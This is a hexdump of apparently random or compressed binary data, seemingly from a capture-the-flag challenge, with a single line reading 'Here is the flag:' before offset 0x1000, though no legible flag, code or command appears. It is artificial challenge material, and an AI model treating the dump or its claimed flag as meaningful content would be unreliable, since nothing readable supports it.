0000480: b447 2604 5dd8 ea73 0eec d948 d7e6 24c5  .G&.]..s...H..$.
0000490: 4775 124e 9f76 d3c2 e900 5217 f5a9 9941  Gu.N.v....R....A
00004a0: 6b4a adcb b8aa ff8b 6634 7694 5d49 0365  kJ......f4v.]I.e
00004b0: 71e1 51b3 4e5e 2543 5403 2164 f7ec 0cb3  q.Q.N^%CT.!d....
00004c0: 8541 178e b631 df10 2f0b 4f3b 4a00 870d  .A...1../.O;J...
00004d0: 63c2 e85b 1e48 84a4 0f8a 8a6c e039 cd3e  c..[.H.....l.9.>
00004e0: 368a 54a6 ad2c 7a32 8b59 ac2e b3e7 6fe9  6.T..,z2.Y....o.
00004f0: 92f9 8f0b 0ec9 9f15 d579 b54f ce64 e858  .........y.O.d.X
0000500: 32ec 9420 bc19 e10a 43e5 9a45 0f7e 29c4  2.. ....C..E.~).
0000510: eeb1 044f a628 35b7 a701 7ce8 7eb7 f3ec  ...O.(5...|.~...
0000520: 642a 5335 b95b 1fb7 d52b 2ba1 6c9a 83da  d*S5.[...++.l...
0000530: 358e f454 0fa0 177c 498f 3552 1727 a7c7  5..T...|I.5R.'..
0000540: 238e b410 e6ca 8f2c 1f9e 7259 ad9f 9ca4  #......,..rY....
0000550: 405e db11 c226 9468 d76b e3f2 2a4f 9189  @^...&.h.k..*O..
0000560: 16cf 0d7a ad33 87ab 0f19 5868 7de0 a226  ...z.3....Xh}..&
0000570: 7f2d 19ea deba e69a 6e1a 3dbd 3721 a2b8  .-......n.=.7!..
0000580: 1baf 9784 a174 9b7f 6b61 82c3 c553 9862  .....t..ka...S.b
0000590: 00bf 4127 b955 79dd 9643 54ba d099 4346  ..A'.Uy..CT...CF
00005a0: 9f52 2ad3 35f3 02f0 cf43 4156 55c9 c56e  .R*.5....CAVU..n
00005b0: a9fe c493 d210 6c09 b1e0 9b52 1864 84b7  ......l....R.d..
00005c0: 8bd3 ebb1 4e6b 9daa c920 64c3 69a7 4173  ....Nk... d.i.As
00005d0: 6fee 1b2f 8a22 6607 87a9 243d 2505 3464  o../."f...$=%.4d
00005e0: e2d9 6de8 7d92 19bb ec39 0b02 9e4b 9224  ..m.}....9...K.$
00005f0: 5d27 c619 3541 0fee 07dd 14f4 f92d 3e4d  ]'..5A.......->M
0000600: 339b 4d9e 4bf9 11dd ca2b 13d9 8e61 f8ea  3.M.K....+...a..
0000610: 8267 3fac 4822 0c35 cf1d a422 601e 700e  .g?.H".5..."`.p.
0000620: 06cd 443b 77f0 571f d9bd 6812 f506 f8e2  ..D;w.W...h.....
0000630: 7e1e 1f60 0c1f 2d9f 2a39 6454 8244 e33a  ~..`..-.*9dT.D.:
0000640: d33c 189a a6f4 4b3d dadb fbbb add6 519c  .<....K=......Q.
0000650: b843 1897 4911 9a96 0b0a ada4 1bfc ea6f  .C..I..........o
0000660: bf9a f705 8263 047a 38de 9520 cb2b fbfd  .....c.z8.. .+..
0000670: cf9f bcf4 c881 f3d1 59a5 374f 39fc c749  ........Y.7O9..I
0000680: f173 1dc9 3cf2 3c72 1600 cd8b 9d3c d38d  .s..<.<r.....<..
0000690: 9421 5c09 1eb2 4574 2b87 b56d 31a3 1e71  .!\...Et+..m1..q
00006a0: e391 044c 8a35 f3ec 9140 1ff4 3f18 4f5a  [email protected]?.OZ
00006b0: 282b 7f68 923e 1fcc dfc1 08c7 3284 84f6  (+.h.>......2...
00006c0: 36ab 68b9 48aa 36b5 62f1 d572 31d3 2049  6.h.H.6.b..r1. I
00006d0: 8e3d cb2d 36da 7c02 7a1c 7ba0 70a3 7251  .=.-6.|.z.{.p.rQ
00006e0: b32b e07b 1edb df67 13f4 a890 7579 c020  .+.{...g....uy. 
00006f0: 9ccf 60f7 b213 cea4 6cfa b77c c77a 09b3  ..`.....l..|.z..
0000700: 9e73 aadf 1507 2906 690c 8b04 3c67 b689  .s....).i...<g..
0000710: dd09 4177 1cf2 d5f8 8ccf 5c81 f00e d6c1  ..Aw......\.....
0000720: 3787 7113 d5c7 96fe bfca e182 95ea 816d  7.q............m
0000730: f12b 0af6 c7fa 971b 5fae e632 edb6 1571  .+......_..2...q
0000740: a4b8 c83d 0111 3a60 6b74 b4f7 0c7c 4bc6  ...=..:`kt...|K.
0000750: aa62 98ce 32e1 72e6 0e11 d38d 2871 2f59  .b..2.r.....(q/Y
0000760: 7662 db31 8d93 ea1e 1779 cb5b 59d5 d38a  vb.1.....y.[Y...
0000770: 71f1 c4e2 35a8 19e1 9ec3 4186 5cb3 64b8  q...5.....A.\.d.
0000780: 62f6 0de2 389e 399b 5a3f 9ca3 4690 fd83  b...8.9.Z?..F...
0000790: 5e14 f3e2 dca1 1bcf 9927 1e2a 27b5 ff53  ^........'.*'..S
00007a0: 2559 9f91 3b2a 8004 07bf f91e b79d 604e  %Y..;*........`N
00007b0: f71c d556 afcd bcaf fee3 fe1a 8c9f 05d4  ...V............
00007c0: 60fa f1b8 d85d 633e d433 3c74 9bc7 de24  `....]c>.3<t...$
00007d0: 47be 67c8 358e 6c62 0754 800c 7d52 5c11  G.g.5.lb.T..}R\.
00007e0: 9cc7 1f14 dad5 960f e7c1 c6bb 850c f95d  ...............]
00007f0: ef3d 668c 0183 58f3 de26 1ac2 f029 8bb0  .=f...X..&...)..
0000800: 72b2 7ffa 725c 82d4 c3f6 4893 71c1 61a1  r...r\....H.q.a.
0000810: 8e1c 0059 e720 8519 b183 8bb4 a1ee 106e  ...Y. .........n
0000820: d3a9 260c 1837 3735 dc95 40ac d425 0e3c  ..&[email protected]%.<
0000830: 3c76 9d1d 9712 b8ee 828d af24 6780 293b  <v.........$g.);
0000840: f6e0 dd76 d59a b9fb 7d5d 6730 7ca5 99a9  ...v....}]g0|...
0000850: a3ba a66c a0e2 0f2f 3d10 d86e a94f f189  ...l.../=..n.O..
0000860: 1e4c 28f1 e4ec 9f76 460c 0df3 f922 160a  .L(....vF...."..
0000870: cf8b aebc b4fe c681 b63c 9406 5038 bdbe  .........<..P8..
0000880: baa3 6e2e e4e1 7c25 bb4f 23f6 98bb 9843  ..n...|%.O#....C
0000890: 69be 4cf6 cd50 d516 d9d6 3c19 2c96 6ccd  i.L..P....<.,.l.
00008a0: 65f6 3569 195e ec01 ece3 a76c d1bc 3e8c  e.5i.^.....l..>.
00008b0: 9825 99f0 41d4 1ad5 bcff e681 7e6b 7563  .%..A.......~kuc
00008c0: 7087 2664 1297 3cfc c923 966f 5e50 d7e7  p.&d..<..#.o^P..
00008d0: 4e6f bf2f 5c18 9f3b 3e9e 839d b7de c4a0  No./\..;>.......
00008e0: 7932 6aef 1ea4 2d88 1f2c 0b30 b478 47f8  y2j...-..,.0.xG.
00008f0: a1dd c329 552b 02b2 3ec9 0266 3f51 8554  ...)U+..>..f?Q.T
0000900: 68b4 c625 9b75 a0ee dbd6 3ff4 b702 1267  h..%.u....?....g
0000910: 0fd6 3f22 72bf da4f a913 6b6e 72d7 c0a9  ..?"r..O..knr...
0000920: 76a4 3f04 fed7 ded0 d697 8d19 2011 247f  v.?......... .$.
0000930: 22d2 5862 40e9 598f b7ca 7f8e 8991 14b0  "[email protected]
0000940: d9be fdad 2106 5a7f aa11 9bca dfc3 4360  ....!.Z.......C`
0000950: dfe4 84c8 3d48 5d10 1904 7d2d 188a 1267  ....=H]...}-...g
0000960: 93a8 f4bd c8b8 7667 fb1a 5f48 8fa5 35d8  ......vg.._H..5.
0000970: 120b 29d2 428c 6fc6 0a63 c2e1 7315 91fb  ..).B.o..c..s...
0000980: 8ba6 f451 1b0c 4be8 ee17 f6eb 358e ecb6  ...Q..K.....5...
0000990: 3578 3e89 2f61 f566 7be3 5db5 86f3 622d  5x>./a.f{.]...b-
00009a0: 871a 102f f19f fccd 2bbe 6c74 9104 4e79  .../....+.lt..Ny
00009b0: b6bd 0e5d 47cf 7665 0eb5 1108 5e18 8768  ...]G.ve....^..h
00009c0: ede4 3027 8ce8 9e95 e0cc e04f 7719 89e9  ..0'.......Ow...
00009d0: 5fa8 e425 5685 b2b9 17e3 f462 67e1 5515  _..%V......bg.U.
00009e0: 74e9 054f a807 06fa 76ba 0b7e 9774 7d47  t..O....v..~.t}G
00009f0: aafa 5988 e539 2b83 6c86 36ae 4d2e ad36  ..Y..9+.l.6.M..6
0000a00: b1ea 4abf 7efe 9180 4ebb c8aa 5e52 7598  ..J.~...N...^Ru.
0000a10: f4d8 6034 155f d769 1915 7f1f 3deb bf1a  ..`4._.i....=...
0000a20: 86c8 c529 958b b7a6 add1 bd83 e971 676c  ...).........qgl
0000a30: dfdb 55ca f3d7 75f3 f201 5152 26d3 a37b  ..U...u...QR&..{
0000a40: 2ccb 635b 09e2 f55d 065a e226 844c 89e5  ,.c[...].Z.&.L..
0000a50: 0a3f 04a1 9dcc db01 baa5 ed31 1352 9895  .?.........1.R..
0000a60: 11e2 7fe0 0250 0799 5790 0471 d890 c3a7  .....P..W..q....
0000a70: 4eb2 e467 236c c2c5 de4b c17e 68a6 5b63  N..g#l...K.~h.[c
0000a80: 67b0 7972 aae6 3c3a bad1 9186 c4ab af29  g.yr..<:.......)
0000a90: e91b f3ae 9dbc 95ad 3c98 f5ba 1c69 2417  ........<....i$.
0000aa0: 8695 f635 405f c7bf e87f 8562 1d65 58f6  [email protected]_.....b.eX.
0000ab0: f94c 07ad 6c35 ff9a 5074 2c8d dfd7 4c90  .L..l5..Pt,...L.
0000ac0: f95d d345 ce19 3535 e0b2 4eb1 0c84 8fc3  .].E..55..N.....
0000ad0: ee31 0e8d 8071 7e75 2116 08b7 ecd3 a60c  .1...q~u!.......
0000ae0: 66ba 9231 2732 9eea ee75 9062 8656 98d0  f..1'2...u.b.V..
0000af0: 06f1 9f4f e857 09aa 1f41 ff9e d4ad 3e70  ...O.W...A....>p
0000b00: a050 5ecc 9610 8766 61a0 8760 064e b2a8  .P^....fa..`.N..
0000b10: 5abe 0164 99c2 f9d8 6dee a279 05aa 6f60  Z..d....m..y..o`
0000b20: 56bc e437 b47e 6011 242d b340 4e61 3638  V..7.~`[email protected]
0000b30: c731 7c3f 4cad feb9 f7e5 7672 6ec6 5bf7  .1|?L.....vrn.[.
0000b40: f518 99c7 7c1a 6f80 c0f1 7dd3 ece5 495e  ....|.o...}...I^
0000b50: 4edb f678 0e85 de1e b4bf 3dd5 b346 c59e  N..x......=..F..
0000b60: ad83 1097 c38d bf4f 988d da48 aec5 fa56  .......O...H...V
0000b70: 2349 d9ad eb4a af2e e13d af2a f98a 6df4  #I...J...=.*..m.
0000b80: 8b69 c960 c3a0 c43b 4771 8f70 e028 3f16  .i.`...;Gq.p.(?.
0000b90: 5c3f 45e0 821a 7ae6 11f5 2d46 e744 c93b  \?E...z...-F.D.;
0000ba0: 184c ae43 2625 3b56 0610 cb4c fc06 94ea  .L.C&%;V...L....
0000bb0: 97b6 1291 c17f 03c6 9841 8954 968f b552  .........A.T...R
0000bc0: 19bf 8b86 21a7 c87d 736f 41e1 75dc ba76  ....!..}soA.u..v
0000bd0: 1045 65a1 9185 4f76 b314 5cb0 1940 e9f3  .Ee...Ov..\[email protected]
0000be0: aa53 99ef e1c5 7f18 4c01 8b3c d4e3 c7ee  .S......L..<....
0000bf0: bde3 9e41 7244 9bf3 2424 e43c 97a4 921b  ...ArD..$$.<....
0000c00: 334d 7974 1700 0c19 ae46 20ae 6cef eb92  3Myt.....F .l...
0000c10: 8e6c 5bed 720a a520 f45d d525 5317 107e  .l[.r.. .].%S..~
0000c20: 1885 7c5e b62d 95f2 6a12 420b b66d f740  ..|^[email protected]
0000c30: 5696 42dc b7e8 5038 6420 72c3 5659 31ac  V.B...P8d r.VY1.
0000c40: 3f96 6fd6 fcad bde1 8574 f0bf a7c1 5105  ?.o......t....Q.
0000c50: 522d 8863 15dd dba3 7a94 ee9c 46a3 6dc0  R-.c....z...F.m.
0000c60: 4047 2deb ffe7 b41e 8836 1002 ad6e 37fc  @G-......6...n7.
0000c70: f21e 05fc aef0 2361 c336 2fd7 38e4 fedd  ......#a.6/.8...
0000c80: 17d5 1419 f84e 00a3 5acf 9309 7b7d d5eb  .....N..Z...{}..
0000c90: 7858 e284 5098 d52b 7ba3 823c 3fa5 8fb2  xX..P..+{..<?...
0000ca0: 2385 e3d9 d37b 6ef5 db73 51b3 d966 d963  #....{n..sQ..f.c
0000cb0: 21ee 2189 1cce 149e d366 d7a4 36b5 48a4  !.!......f..6.H.
0000cc0: ffdb 8ae6 384f e27d f1d3 a2d3 9756 2bd9  ....8O.}.....V+.
0000cd0: 574d 437e 4e18 ac44 4b87 c21f 6b5a d4d2  WMC~N..DK...kZ..
0000ce0: c5cc ad73 6ad6 6a53 1628 f0bc c029 51c0  ...sj.jS.(...)Q.
0000cf0: 7edf 68f5 690c 92ad e2d3 ff55 1dc4 983f  ~.h.i......U...?
0000d00: ed43 9a97 0fe1 4942 261a ba90 3988 df36  .C....IB&...9..6
0000d10: 8b6b b0d4 9288 f148 33d6 d69c 78f5 5549  .k.....H3...x.UI
0000d20: 599a 0032 827c da29 e827 a521 db41 a810  Y..2.|.).'.!.A..
0000d30: 9b61 9770 4de1 bb58 c719 fb5f 450b 49fc  .a.pM..X..._E.I.
0000d40: cda2 1ba9 6a1b 0e57 128d 021f 61a3 678c  ....j..W....a.g.
0000d50: c77b c507 c588 73f6 a0ff 23e7 169f 925f  .{....s...#...._
0000d60: cb32 66c6 ed48 75f9 6d36 e207 8b76 6ccf  .2f..Hu.m6...vl.
0000d70: 448e d6d5 aa14 3b3d 81cc 31e0 7c1d 218d  D.....;=..1.|.!.
0000d80: 6303 3572 e38f 50cd 4cbd b3e8 f9bf efc6  c.5r..P.L.......
0000d90: d801 9d4b f27f 2efe cccf 3254 a609 c7a8  ...K......2T....
0000da0: c294 269d 8994 7154 8ce9 a935 9d50 8d1b  ..&...qT...5.P..
0000db0: fbec 2222 f950 d50c 440c c928 4ee5 7c6a  .."".P..D..(N.|j
0000dc0: c111 4c22 f7d7 ecd3 8f04 e7db aecb 4cc7  ..L"..........L.
0000dd0: 74f1 2d20 8875 ae23 f1fb 4ee5 0f16 ed54  t.- .u.#..N....T
0000de0: 9957 3bb7 42b6 4ef5 db3f 183c 9f4d 3512  .W;.B.N..?.<.M5.
0000df0: 2841 9bb6 a324 703c ab00 23f0 c7f7 898c  (A...$p<..#.....
0000e00: eebd 534a 6476 1b90 9a0f fdc9 998d 263b  ..SJdv........&;
0000e10: 6f9c cabf 98f2 cc8d c137 ddd6 0fb2 32f3  o........7....2.
0000e20: 15ac 0e29 ea93 5644 0dd0 ae2e addc 4b0e  ...)..VD......K.
0000e30: 5d68 1f92 1f53 d950 4997 27d8 03aa d521  ]h...S.PI.'....!
0000e40: 93f8 8227 7170 58b1 4be7 3921 6564 f14e  ...'qpX.K.9!ed.N
0000e50: 3fff 4514 af8a cc17 3731 9390 9063 9fa4  ?.E.....71...c..
0000e60: 0360 fc9c d5cc 1c2c da2b 9066 5d23 f647  .`.....,.+.f]#.G
0000e70: 40a2 2eb3 6a94 4621 efb4 4d20 4498 30e8  @...j.F!..M D.0.
0000e80: 7a54 95b7 6634 bfa7 9ed7 4cd2 cf30 d3d1  zT..f4....L..0..
0000e90: 6d22 296f c5a3 7fbd bdf6 7b84 3f16 11bc  m")o......{.?...
0000ea0: 8e99 8e59 1da4 1ec2 5f4d 5425 29f5 1c99  ...Y...._MT%)...
0000eb0: 9b4a 5764 1cf9 9fed 8bd2 a0e6 6644 d89d  .JWd........fD..
0000ec0: 85d6 6c44 3f76 7933 e9cd b2c8 71c7 d330  ..lD?vy3....q..0
0000ed0: 020a e943 b3ff 3b54 8ebb a5ac 879a b9f7  ...C..;T........
0000ee0: 122c 7e4a 4ce4 1a97 a0c8 35e0 c6eb bd1f  .,~JL.....5.....
0000ef0: 4726 d22b 5f18 6eb4 b4db 6913 9af4 f3ae  G&.+_.n...i.....
0000f00: 501e b280 aa8f 0473 dbaf 188e 6041 9236  P......s....`A.6
0000f10: 9424 bbb4 96ab f4c4 e1bf 9833 44a3 259a  .$.........3D.%.
0000f20: aed0 fdbd ded7 5fa6 f573 d4e3 c9eb c298  ......_..s......
0000f30: 8050 f558 928d 3fdf 7e1c 0d76 45d8 2d9d  .P.X..?.~..vE.-.
0000f40: 69ed fdeb c75b 7fbc 3f6b 70c5 610a dbdc  i....[..?kp.a...
0000f50: 47be f29f 2b65 673f 8114 9969 8c3e 98cd  G...+eg?...i.>..
0000f60: 0bf0 8916 f2ae 8c49 3de1 c68a ab00 b14a  .......I=......J
0000f70: 68f2 9918 09cf c619 1017 0670 ca65 a4e0  h..........p.e..
0000f80: bd7e adb0 2e77 27d2 70b8 cd15 82c5 5d7a  .~...w'.p.....]z
0000f90: fadc ed4d 8a11 c068 7b00 0894 e072 c00a  ...M...h{....r..
0000fa0: a9d1 8210 5a2b 754f 9b94 7a9f 42a6 9140  [email protected]
0000fb0: fa36 dd24 7cc5 80d5 d868 3b5a 6c9c 1d66  .6.$|....h;Zl..f
0000fc0: ce60 c361 8679 7500 fe10 248c b54d d848  .`.a.yu...$..M.H
0000fd0: 7d4c 0fc3 3f28 7888 f6f9 80a1 976a e088  }L..?(x......j..
0000fe0: 054e 5cae faf4 8a4c ba6b 97e4 d457 8846  .N\....L.k...W.F
0000ff0: 1d4a e83c 17af ef3b 07cb 2b49 34e3 9159  .J.<...;..+I4..Y

Here is the flag:

0001000: bee3 f21b aca4 8e86 0cb8 9c14 f003 96f0  ................
0001010: bba1 850d 2d53 6328 457a 6668 3c7a a41c  ....-Sc(Ezfh<z..
0001020: 1381 1c90 c20e d8fb 2a59 ada1 0ccf 97a4  ........*Y......
0001030: db16 ede3 f6f1 e68b 90d1 6256 1db1 dd05  ..........bV....
0001040: 15dc 9ea9 a9c8 f7d9 1887 5228 d995 2ecf  ..........R(....
0001050: 06d0 179b 5073 674f 6f2c fc89 8311 bd13  ....PsgOo,......
0001060: 88c4 b9de 8298 9900 c118 f0b4 0394 c0ef  ................
0001070: ce92 930c fabc db9d 8690 900d fbb3 bfd4  ................
0001080: 1cd2 2ec0 4c5a b280 9dea 6e78 d9e4 aec9  ....LZ....nx....
0001090: 1b0b b312 6269 c2db 8dbe 2538 d1e4 ceb0  ....bi....%8....
00010a0: 0199 a388 295d 4923 3c56 7d5f 5327 da81  ....)]I#<V}_S'..
00010b0: c6da 062e 7229 e80c c6cb 96d5 a7f5 d2f7  ....r)..........
00010c0: 1bed dfac 2866 12e8 d5e6 a79b 0ae2 a3bf  ....(f..........
00010d0: e697 95b9 bfd9 9ce6 a5e6 e3a6 ecd0 be95  ................
00010e0: 9302 d19f e6f1 8ca0 ede2 eecb bea4 a4f6  ................
00010f0: b6a1 d9ee 91c4 84ae 81c9 6d47 9ddd e002  ..........mG....
0001100: de14 87b2 acba d383 8ef9 567c e9fd c0dd  ..........V|....
0001110: 86be 87c5 3a71 4658 3e42 5230 4a47 b9cc  ....:qFX>BR0JG..
0001120: 94fe e1ff 3e40 0feb a51d 564a a010 a9ec  ....>@....VJ....
0001130: 1782 b4e9 6f2b 07c2 a98b 466a aedc b3ac  ....o+....Fj....
0001140: 16c4 02b6 051c b6f9 9b93 0412 839a 93fd  ................
0001150: db1d 881c cfbf 9aa4 fce5 089d 0bf8 85fd  ................
0001160: f69e 9db0 5b35 6f2d 5b2b 981d 0d86 e792  ....[5o-[+......
0001170: c3e7 eef8 5b5b b198 6026 6a40 ca08 93dd  ....[[..`&[email protected]
0001180: 04d0 e8a8 6c79 08d3 9ad8 3875 bfad dafe  ....ly....8u....
0001190: b8e2 ceb7 492b ecb1 c704 5036 ec9e ca94  ....I+....P6....
00011a0: a8f6 e4ba 7367 ea83 694b b6c8 bdf4 b984  ....sg..iK......
00011b0: f518 1297 888a e09f ef86 f8df d5cd e3db  ................
00011c0: 1819 18b6 93be cd8d b600 85f0 cef7 e30f  ................
00011d0: bdd2 8eb6 7a54 567d 3f65 f0ba ad86 1a14  ....zTV}?e......
00011e0: bb9a cbeb 5834 1e9a 6b34 436b 9105 9ed2  ....X4..k4Ck....
00011f0: 1dcf edfa 7859 02ab 06c4 543d f015 17ed  ....xY....T=....
0001200: 91ee ca01 5c3a fca4 4553 4a7e 81fb b216  ....\:..ESJ~....
0001210: f20c 85fb 645a 593f 7761 d501 18cf c4f0  ....dZY?wa......
0001220: e2b2 15f2 b8b9 04a3 d697 ed17 808e e51a  ................
0001230: b6ab bcdb a4f9 f9ac 86d8 f182 a300 aa00  ................
0001240: 82c9 ef13 622d 6f28 6843 3439 cd0e d5e6  ....b-o(hC49....
0001250: f1cb 08e3 dad7 8bb2 7e47 cff0 bdd7 ef8e  ........~G......
0001260: 9cd6 0ca3 e20f f807 07fe 6c43 0eb7 a0c2  ..........lC....
0001270: 01a5 88ba d88d 18a3 8ac6 3878 d1c8 f5d9  ..........8x....
0001280: d092 dff8 4d5c 554e 736c 16ac c7df a0ad  ....M\UNsl......
0001290: faa7 e9fe bfe6 17d3 a000 921a a6bc 91a3  ................
00012a0: 1f9c fde6 8ee4 dbe7 baf4 0aa1 f8b6 0e90  ................
00012b0: d916 be1c 0f92 84fb 4352 0ec5 e711 81e8  ........CR......
00012c0: e989 9015 157f fff9 3878 e299 c5ae bf9c  ........8x......
00012d0: 921c badf 6e39 392b 283a 2746 373c 992e  ....n99+(:'F7<..
00012e0: fae8 6426 cbc6 c190 85ad e0ec 6423 ae9c  ..d&........d#..
00012f0: a50b 457c a992 ab10 9199 9bd0 3868 94b7  ..E|........8h..
0001300: 9d8f af04 b5a7 14fd deaa 7ff8 80f7 1ad1  ................
0001310: dabf eef2 e282 cc92 7b68 3074 483c b411  ........{h0tH<..
0001320: 9a84 d2b4 5473 574f a2b1 e2a8 9f9a 02d2  ....TsWO........
0001330: 868e bdbf ab8f 5871 2b5f a981 d593 19c3  ......Xq+_......
0001340: 8302 8595 8bd4 ac93 2c5a 6d6e aaa5 a7fe  ........,Zmn....
0001350: f2f1 deab 060f 672c 7c4d bb8d 130d f0e6  ......g,|M......
0001360: fcc0 e3fc 7322 235f bcb1 0ccd cbf8 f5f2  ....s"#_........
0001370: f2cc 0993 ffa7 5c4d 284e 2852 7a3a bfa7  ......\M(N(Rz:..
0001380: 1ea2 d2ce 1ae0 df1d 97c1 d1c4 b4c9 99d2  ................
0001390: baac e3a3 763a 5d67 3856 6250 5574 bfd9  ....v:]g8VbPUt..
00013a0: c9b0 02b0 7b30 1a99 6724 82c7 3928 061e  ....{0..g$..9(..
00013b0: ab82 0eee 2f64 9811 5c56 dbc9 2c33 8b14  ..../d..\V..,3..
00013c0: 83dc dcb7 456b 0cd7 733f 16cb 7522 1fd9  ....Ek..s?..u"..
00013d0: e41b bce7 7171 b103 526f e51d 785e e6a7  ....qq..Ro..x^..
00013e0: 147f eabe 7e63 94a6 5554 f3b2 3466 c881  ....~c..UT..4f..
00013f0: b5b3 11bb c9a8 97d4 abb8 86d3 cec1 defd  ................
0001400: 89eb a20e f79f bdb3 c4ac 12d3 dccd d20c  ................
0001410: d8be 81d4 089f 8d12 aba8 d4f0 b1b4 9afd  ................
0001420: ebda e210 c093 da85 8ad3 ff84 83ce b89b  ................
0001430: fab5 f4b5 c6ff c4a1 7ff7 e0f9 1cda ceeb  ................
0001440: 19d3 dc1f 17bb 88a0 b81b 9ea0 f1df 85f1  ................
0001450: 878f c5ae 0fb4 c089 f6d4 8f10 a5b7 7fc7  ................
0001460: f808 bd7f 15bb 84f5 b28a 02fa 1cd4 bfe0  ................
0001470: fd97 d0fb 5536 4224 7e71 6a2d 3e48 1ae8  ....U6B$~qj->H..
0001480: df19 a7ff 4e49 99c3 8b87 93dc 9fd4 c7ec  ....NI..........
0001490: 8ddb cffa 576b fb2e 0cfe a5f3 05fa c404  ....Wk..........
00014a0: d980 bae0 773d eadb bfbb 0bae c9cb 9f10  ....w=..........
00014b0: 98d4 ceee 2627 a61b f195 a693 929a f0d3  ....&'..........
00014c0: d2fa dd1f 5e3f 7930 4474 3266 737b a0c7  ....^?y0Dt2fs{..
00014d0: e1b8 9eab d4b7 afe3 c40f ecff f8f0 1600  ................
00014e0: 11c4 ecc5 5722 14bc 4f76 3565 07d3 96f6  ....W"..Ov5e....
00014f0: 89e4 9fc4 3378 878c 2572 5d30 664c 140d  ....3x..%r]0fL..
0001500: c58e a3a5 7059 90c9 5628 c413 7e3f aead  ....pY..V(..~?..
0001510: 17ef f290 6969 ba90 6e57 1fb9 3546 9d1f  ....ii..nW..5F..
0001520: 029c 93db 6c2a 735b 6468 c187 2a52 1e1c  ....l*s[dh..*R..
0001530: 16c4 aafb 7267 5577 d81e 7866 9509 9e8e  ....rgUw..xf....
0001540: 90a6 b786 ff12 aee8 868b c81a fde4 e893  ................
0001550: b1c5 8acb 227d 7441 546a 3d69 4531 fbb4  ...."}tATj=iE1..
0001560: edb0 96e0 6d6d b6ab 6456 f695 3f67 82b7  ....mm..dV..?g..
0001570: be92 9a1d 6664 e9de 3625 d0c0 5e66 f9a3  ....fd..6%..^f..
0001580: b010 c414 355a cc80 2d60 9aaa 6949 9690  ....5Z..-`..iI..
0001590: 94be 9aad 693f b9d7 3649 94de 3c33 0a9a  ....i?..6I..<3..
00015a0: c7b7 ceb2 2c29 1807 6571 a016 6326 efa1  ....,)..eq..c&..
00015b0: e7f0 0c1b a97f 8cb6 b880 90ea b5fe 08d9  ................
00015c0: 8909 0f16 e41f 8417 b4bc 1883 9e85 d1f7  ................
00015d0: b599 fff2 9406 db8b a2f6 dee0 97af 0816  ................
00015e0: f0e5 bef7 cf18 88a7 1fa3 9ea8 a2c8 f610  ................
00015f0: dea8 12ed 9eb1 d8ea af9d ca08 1396 9893  ................
0001600: a316 948e 98a4 ee10 b6f9 bcc1 e114 7ff9  ................
0001610: 1dae 8f7f f7ec e38c b8a3 c4e7 0005 05bd  ................
0001620: 9a12 8603 0d11 9004 0798 c7bb f7a1 0910  ................
0001630: b7ec a4e7 2949 d5f1 b3d9 1984 4863 f71f  ....)I......Hc..
0001640: b311 e4b5 6549 6748 dfc9 7d26 04e2 01d7  ....eIgH..}&....
0001650: dd17 00f0 1b1b 2434 2c74 0da6 bf16 a6dd  ......$4,t......
0001660: eed9 b8db d280 434a 2134 99c2 8e15 1ca8  ......CJ!4......
0001670: 1acd c01d 3854 7d27 97e4 775e c3fc 81ae  ....8T}'..w^....
0001680: ea9d c193 7732 9f9f ec8e f28e 7159 a1a1  ....w2......qY..
0001690: 90c9 d0f1 9dc8 1e88 f491 9590 c2fb dd05  ................
00016a0: 1c05 d880 506b 859c 9f8c f305 6b38 f09a  ....Pk......k8..
00016b0: e0cc a4c4 5760 6940 84fe 723c e3d1 fcfd  ....W`[email protected]<....
00016c0: dfaa f1f7 0501 5878 2525 b7d8 8faf c6f2  ......Xx%%......
00016d0: 13b3 f9ba efed 5343 314b f399 f6f0 dba3  ......SC1K......
00016e0: 87eb bcc9 6472 404e f5ab 706e 0d1e e50c  [email protected]
00016f0: c37f 9203 716a f6cd fdb4 c2b4 3c23 e3e1  ....qj......<#..
0001700: aff3 d311 17d4 e712 16e6 d8ae b6b6 df0b  ................
0001710: bff4 81af 7d39 7e2f 606f 5a54 4963 a7d4  ....}9~/`oZTIc..
0001720: d3fe d49a 274a 99d8 b7e3 9599 555d 14de  ....'J......U]..
0001730: e81f d9ef 3e4f ff88 f6f7 ffdc 3572 d5c9  ....>O......5r..
0001740: cbc7 e7e4 6532 8efa 1dbf e28b 777b dbf1  ....e2......w{..
0001750: e20f 938e 703b bea6 baa0 2236 9210 e6a0  ....p;...."6....
0001760: d8ba 1405 9b7f 4852 683c 643f e209 1ec5  ......HRh<d?....
0001770: f89b a6ae dbe9 cbde 81d0 dcfe f41f aeb3  ................
0001780: e3f5 8a00 f90e e3bf e595 b5e8 fe8a c0e3  ................
0001790: 0215 85b2 af97 1395 a2e1 8d8a fafc b89e  ................
00017a0: f9ed 05d9 09f3 cbad ecfa c2c3 f8e7 c6f1  ................
00017b0: 970d bfce c807 0405 18d5 bd00 1ad6 88b4  ................
00017c0: cbc1 f3f9 fd1e ba80 08c7 88e9 ccd7 0dae  ................
00017d0: ca08 89f0 10ff e1b1 1ebf a3a7 8ad7 0dea  ................
00017e0: cf93 199a 859a 042e 0ce7 bc89 e1f2 d218  ................
00017f0: a08e ec02 5322 f1c6 13cf 8c8a 5e7c e0ac  ....S"......^|..
0001800: 95ef 862e 624f 99d3 16bf d69c 4155 84bc  ....bO......AU..
0001810: 1089 058d 4846 3f39 3644 2747 335b 03f3  ....HF?96D'G3[..
0001820: 2efd 1e9a 2c60 efb6 eab7 8989 6879 16e5  ....,`......hy..
0001830: b5b2 e4a3 323d e2ed a6f3 b818 7d6a bfa1  ....2=......}j..
0001840: 0fc4 d0a7 b908 960c b5e1 19db f5c1 bdce  ................
0001850: f4fd bd91 b7d3 c4f4 f187 af0b b709 01f1  ................
0001860: cd06 1887 303a 542f 3a58 7c72 6b5f 2ec7  ....0:T/:X|rk_..
0001870: 14df 0ab2 9895 039e 9ff3 693e 2f3d 931f  ..........i>/=..
0001880: 04b7 aa09 c9c6 a100 6175 5959 a2f0 c6fe  ........auYY....
0001890: 070d 8dc7 f081 2642 5c71 059f aa80 bab8  ......&B\q......
00018a0: 151b b8a1 5623 15de eb1e d9b6 defc 80b1  ....V#..........
00018b0: a3f0 1ead 4d61 6e3c 5e64 6c2a 283c 920c  ....Man<^dl*(<..
00018c0: eaba 8009 811c df05 8206 a3de a3b0 97fe  ................
00018d0: 05c3 1483 786a 1acb 2775 7063 1f11 0bcd  ....xj..'upc....
00018e0: 1201 bcd2 6f53 94e2 664b 3f79 5448 f0b9  ....oS..fK?yTH..
00018f0: dcae c3d0 7e6b fa8a 774f fbf9 5c59 89a0  ....~k..wO..\Y..
